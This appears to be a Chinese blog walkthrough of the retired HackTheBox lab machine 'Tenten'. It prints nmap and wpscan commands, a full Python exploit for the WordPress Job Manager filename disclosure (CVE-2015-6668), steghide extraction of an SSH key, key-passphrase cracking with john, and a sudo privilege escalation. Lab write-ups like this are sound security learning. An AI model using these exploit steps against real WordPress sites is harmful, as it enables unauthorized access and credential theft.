HTB-靶机-Tenten

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.10

nmap -sC -sV -p- -T5 10.10.10.10 -oN tenten.nmap

nmap扫描结果

就开了两个端口,看下Web应用,发现是个wordpress 点击了几个页面,发现下面这个

点下那个Apply Now 到了如下页面

得到上面的url地址:http://10.10.10.10/index.php/jobs/apply/8/ 其中最末尾是个数字,可以先探测下,这里可以使用burpsuite,wfuzz进行探测,我为了方便显示就使用shell脚本循环进行探测显示

for i in $(seq 1 25); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done

发现了一个标题信息为HackerAccessGranted,这是个重要的提示信息,先放着,我们使用wpscan扫描下目标并枚举下存在哪些用户,在使用之前需要先在https://wpscan.com/ 注册下免费的账户,然后使用官方免费的api来获取漏洞信息,不然wpscan扫描不了任何漏洞信息,我这里已经注册好了,下面是扫描结果

wpscan --url http://10.10.10.10 -e ap,t,tt,u --api-token pFokhQNG8ZFEmmntdfHfTYnrYdnvJHKtVtDuHTqTqBc

发现一个插件漏洞可以探测出敏感信息,编号是CVE-2015-6668这里可以使用下面的exploit

https://raw.githubusercontent.com/Johk3/HTB_Walkthrough/master/Tenten/disclosurevuln.py

https://raw.githubusercontent.com/Jack-Barradell/exploits/master/CVE-2015-6668/cve-2015-6668.py   这个没测试成功

import requests

print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')

filename2 = filename.replace(" ", "-")

for year in range(2016,2018):
    for i in range(1,13):
        for extension in {'jpeg','txt','doc','pdf','docx'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL

上面测试的结果:

根据上面信息最终得出了图片文件地址:http://10.10.10.10//wp-content/uploads/2017/04/HackerAccessGranted.jpg

同时上面wpscan扫描发现一个目标wordpress用户名,后面应该会用到,先放着

访问http://10.10.10.10//wp-content/uploads/2017/04/HackerAccessGranted.jpg 并下载下来

使用wget下载下来使用strings命令没查到有价值的信息,然后捣鼓了半天确认该图片使用了隐写术存放了隐藏文件,需要使用此命令 steghide 相关用法参考:https://blog.csdn.net/abc_12366/article/details/87098397

steghide extract -sf HackerAccessGranted.jpg

使用上面命令执行之后需要输入密码,尝试直接敲击回车使用空密码 登录上去了

此时生成了文件id_rsa 查看一下该文件

直接使用该文件进行ssh登录,用户就是上面wpscan扫描到的用户

需要输入密钥的密码,没法了,使用john进行暴力破解了,破解之前先使用ssh2john转换为john能识别的形式

python /usr/share/john/ssh2john.py id_rsa > bmfxcrack.txt

破解出来密钥的密码是superpassword ,那么再次远程ssh登录目标靶机

成功登录,执行了下sudo -l 可以提权的文件是fuckin  ,看下该文件是什么类型的,发现就是bash脚本,然后看下里面的内容,加了shell的位置变量,这就好办了,直接提权

posted @ 2020-10-30 17:55  皇帽讲绿帽带法技巧  阅读(319)  评论(0编辑  收藏  举报